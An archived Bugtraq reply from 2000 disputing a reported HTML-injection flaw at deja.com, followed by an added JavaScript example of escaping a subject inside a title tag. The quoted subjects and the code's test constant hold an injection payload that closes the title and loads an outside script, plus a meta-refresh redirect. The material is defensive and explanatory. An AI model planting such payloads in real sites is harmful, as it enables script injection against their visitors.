
Bugtraq mailing list archives

Re: Malicious-HTML vulnerabilities at deja.com
From: geert () UTTNARAG TN UTWENTE NL (Geert Altena)
Date: Fri, 17 Mar 2000 12:31:46 +0100

You, Niall Smart, <niall () POBOX COM>, wrote:

deja.com does not always escape meta-characters when displaying
Usenet articles.  Specifically, the article view page
(http://www.deja.com/getdoc.xp) and the thread view page
(http://www.deja.com/viewthread.xp) display the subject of the
article "as is" between title tags.


JavaScript popup:


Comes out as (copy/paste from Netscape):
Forum: alt.test
Thread: </title><script
onLoad="return bar()">
Message 1 of 1

Subject: </title><script src="http://www.in-design.com/~nsmart/foo.js";>
         </script><body onLoad="return bar()">
Date: 03/01/2000
Author: regkey <regkey () yahoo com>

I have JavaScript enabled, no popup.

Redirection using meta tag:


Comes out as:
Forum: alt.test
Thread: </title><meta http-equiv="refresh"
Message 1 of 1

Subject: </title><meta http-equiv="refresh"
Date: 03/01/2000
Author: regkey <regkey () yahoo com>

No redirection here to www.in-design.com.

Looking at the source, in both cases (JavaScript and meta refresh) the
"<" and ">" are properly replaced by "&lt;" and "&gt;", eliminating the
vulnerabilities you mentioned. The same thing applies when I get the article
via PowerSearch.

So either someone at Deja reads Bugtraq and did a fix before this reply or
this is a case where things _are_ properly escaped.


Geert Altena | Geert () uttnarag tn utwente nl | Coffee, black, no sugar
         Finger for PGPkey : Diffie-Hellman 2048/0xC540C550
  Prediction is difficult, especially of the future. - (Niels Bohr)
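The two behaviours discussed in this thread, a subject line dropped "as is" between title tags versus the entity-encoded output Geert saw in the page source, side by side as an added example. This is not code from deja.com or from either poster; the function names, the page skeleton and the sample subject (modelled on the one quoted above) are constructed for illustration.

```javascript
// Added example, not deja.com's code: a Usenet subject placed inside <title>
// without escaping closes the element early and injects markup; replacing the
// HTML meta-characters with entities (as observed in the fixed page) stops it.

// Constructed input, modelled on the subject quoted in the thread.
const SUBJECT_PAYLOAD =
  '</title><script src="http://www.in-design.com/~nsmart/foo.js"></script>' +
  '<body onLoad="return bar()">';

// Vulnerable rendering (hypothetical page skeleton): subject inserted "as is".
function renderTitleUnescaped(subject) {
  return `<html><head><title>${subject}</title></head><body></body></html>`;
}

// Entity-encode the characters that can change HTML structure or break out of
// an attribute. Ampersand is handled first so the other entities are not
// double-encoded; quotes are included so the same helper is safe in attributes.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Fixed rendering: same skeleton, subject escaped before insertion.
function renderTitleEscaped(subject) {
  return `<html><head><title>${escapeHtml(subject)}</title></head><body></body></html>`;
}

// Check the way Geert did, by looking at the source: count the tag openers
// ('<' followed by a letter or '/') actually present in the page. Any tag
// beyond those of the bare skeleton came from the subject.
function countTags(html) {
  return (html.match(/<[a-zA-Z/]/g) || []).length;
}

// Tag count of the skeleton with an empty subject: the expected number.
const BASELINE_TAGS = countTags(renderTitleUnescaped(''));

// True when the subject contributed no markup of its own to the page.
function subjectIsInert(renderFn, subject) {
  return countTags(renderFn(subject)) === BASELINE_TAGS;
}
```

Run with `node` and call `subjectIsInert(renderTitleUnescaped, SUBJECT_PAYLOAD)` and `subjectIsInert(renderTitleEscaped, SUBJECT_PAYLOAD)`: the first is false (the injected `</title>`, `<script>` and `<body>` tags appear in the page), the second is true, and the escaped source shows `&lt;/title&gt;&lt;script ...` exactly as described in the reply.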

